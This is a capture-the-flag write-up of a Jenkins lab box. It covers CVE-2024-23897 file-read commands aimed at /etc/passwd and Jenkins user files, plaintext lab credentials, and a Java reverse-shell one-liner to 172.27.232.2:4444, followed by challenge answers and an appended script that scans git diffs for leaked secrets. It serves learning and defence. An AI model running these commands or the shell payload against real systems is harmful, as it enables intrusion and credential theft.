# Web Range-123-125

## Challenge 123

## Challenge 124

## Challenge 125

![image](https://hackmd.io/_uploads/Syo3VCGFex.png)

* Rustscan
* ![image](https://hackmd.io/_uploads/H1q_HRMFgg.png)
* Nmap
* ![image](https://hackmd.io/_uploads/Sk4crCftxx.png)
* ![image](https://hackmd.io/_uploads/SJyoB0MFel.png)
* The scan found no usable paths. Port 8080 is a Jenkins login page, and the server is Jetty.
* ![image](https://hackmd.io/_uploads/Hyv0Y0MYxl.png)
* ![image](https://hackmd.io/_uploads/rJwSqCGYel.png)
* Used Metasploit to identify the Jenkins version: `2.332.2`
* ![image](https://hackmd.io/_uploads/HJpwK1mtge.png)
* Referenced the writeup below; I had previously attacked an [HTB box](https://hackmd.io/iA7HK6vETNOmGNcKjukEOQ?view) with CVE-2024-23897. First download the jenkins-cli jar.
  * https://0xdf.gitlab.io/2024/02/12/htb-builder.html#authenticate-jenkins-access
  * https://github.com/AiK1d/CVE-2024-23897/blob/main/jenkins-cli.jar
* Arbitrary file read
* ![image](https://hackmd.io/_uploads/SkL7rZmFle.png)

```zsh
java -jar jenkins-cli.jar -s 'http://10.10.1.194:8080' -auth admin:BmHRA0Q7ZnP1g56 connect-node '@/etc/passwd'
```

* Hostname is `JenRunn2`
* ![image](https://hackmd.io/_uploads/S1-xbemFle.png)

```zsh
java -jar jenkins-cli.jar -s 'http://10.10.1.194:8080' help '@/etc/hostname a'
```

* Forgot that FTP was open; there is an archive on it.
* ![image](https://hackmd.io/_uploads/B1bE7b7Klx.png)
* It contains a set of MySQL credentials
* ![image](https://hackmd.io/_uploads/HyMoX-mYgl.png)
* `root:PoFwwIe8$d!TiL*Fw`
* The important part is this `.git` folder
* ![image](https://hackmd.io/_uploads/r1TAQbXFgg.png)
* OK, found admin password for jenkins
* ![image](https://hackmd.io/_uploads/HkaUVWQKgx.png)
* `admin:BmHRA0Q7ZnP1g56`
* `root:PFDqTiLFWAd!wIe8#@`

```zsh
git diff-tree -p HEAD
```

* Saw some information in `/var/lib/jenkins/users/users.xml`
* ![image](https://hackmd.io/_uploads/rJ2FFZmYeg.png)

```zsh
java -jar jenkins-cli.jar -s 'http://10.10.1.194:8080' -auth admin:BmHRA0Q7ZnP1g56 reload-job '@/var/lib/jenkins/users/users.xml'
```

* Digging further, found a password hash in `config.xml`
* ![image](https://hackmd.io/_uploads/r14L5-mtex.png)
* ![image](https://hackmd.io/_uploads/ryGrqWQKlg.png)
* Found a password, but it is very long and I don't know where it is used
* ![image](https://hackmd.io/_uploads/rJ4sAZmKxl.png)
* `12xcn2hbOv/+pT4ef/w/28TosA9gAZ2T4woxsLtk38S1A/SzH2j4sV0MmqOrHDuIx1QFPUz81n0cwPK5C7ZoIkTG0bDLkuGg+wy+kO1pmGjiDoCSd1I5kNxR9ORc/2ezetfjhF8sy5j6Q8IDL69n5i9ynPYzgOBpanuOCaLOEVV/VZY36LcRbHEmmungPuZ7`

## Groovy Script RCE used before

* ![image](https://hackmd.io/_uploads/BkREUBQFxx.png)
* Also followed this collection of Jenkins attack techniques and got a shell via a Groovy script
  * https://github.com/gquere/pwn_jenkins
* ![image](https://hackmd.io/_uploads/Bk1vLSXFxx.png)
* ![image](https://hackmd.io/_uploads/B1o9UBQtxg.png)

```java
String host="172.27.232.2"; int port=4444; String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

* Found another hash in `/var/www/html/index.html`
* ![image](https://hackmd.io/_uploads/ry38UwQFxe.png)
* `464e0fb146194482a3ab153fc11e6346175a63f0`
* OK, the root credentials from the earlier `git log` work directly with `su root`; SSH is not even open = =
* ![image](https://hackmd.io/_uploads/S14rQdStge.png)

## Answer

* Challenge 123: `admin and BmHRA0Q7ZnP1g56`
* Challenge 124: `Jen_Runn_2_ZFCQ`
  * The challenge says file.txt but the answer is in flag.txt??
  * ![image](https://hackmd.io/_uploads/HyfSjDmtgl.png)
* Challenge 125: `FZCQ_passwd_root`
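The root password in this box came straight out of `git diff-tree -p HEAD` on a `.git` folder that had been packaged and left on FTP. As an added example (not part of the writeup), the following script parses that same diff output and flags added lines that look like committed credentials, which is the check to run before a repository is archived or published. The diff text and the secret values in it are constructed for illustration.

```python
"""Flag credential-looking additions in `git diff-tree -p HEAD` output."""
import re
from typing import List, Optional, Tuple

# Patterns worth flagging in committed source and config (constructed for this example).
CREDENTIAL_PATTERNS = [
    re.compile(r"(?i)\b(pass(word|wd)?|secret|token)\s*[:=]\s*['\"]?[^'\"\s]+"),
    re.compile(r"(?i)\b[a-z]+://[^/\s:@]+:[^/\s@]+@"),  # user:pass@host inside a URL
]
HUNK_RE = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)(?:,\d+)? @@")

def find_leaked_secrets(diff_text: str) -> List[Tuple[Optional[str], int, str]]:
    """Return (file, new-side line number, content) for added lines matching a pattern."""
    findings = []
    current_file: Optional[str] = None
    new_line = 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):           # new-side file header: "+++ b/path"
            current_file = raw[4:].split("\t")[0]
            current_file = current_file[2:] if current_file.startswith("b/") else current_file
            continue
        m = HUNK_RE.match(raw)
        if m:                                # hunk header carries the new-side start line
            new_line = int(m.group(1))
            continue
        if raw.startswith("\\") or (raw.startswith("-") and not raw.startswith("---")):
            continue                         # "\ No newline" marker or removed line: no new-side number
        if raw.startswith("+"):
            content = raw[1:]
            if any(p.search(content) for p in CREDENTIAL_PATTERNS):
                findings.append((current_file, new_line, content.strip()))
        new_line += 1                        # context and added lines both advance the new side
    return findings

# Constructed sample diff: a DB config and a README that each leak a (fake) credential.
SAMPLE_DIFF = """\
diff --git a/config/db.php b/config/db.php
--- a/config/db.php
+++ b/config/db.php
@@ -1,4 +1,5 @@
 <?php
 $host = 'localhost';
-$user = 'app';
+$user = 'root';
+$pass = 'EXAMPLE-not-a-real-secret';
 $db = 'shop';
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1,2 +1,3 @@
 # Shop
+Connect with mysql://root:EXAMPLE@127.0.0.1/shop for local testing.
 Run composer install.
"""

if __name__ == "__main__":
    for path, line, text in find_leaked_secrets(SAMPLE_DIFF):
        print(f"{path}:{line}: {text}")
```

Pipe real output in with `git diff-tree -p HEAD | python3 scan.py` (reading `sys.stdin` instead of `SAMPLE_DIFF`) and iterate over `git rev-list --all` to cover the whole history, since a secret removed in a later commit is still recoverable from earlier ones.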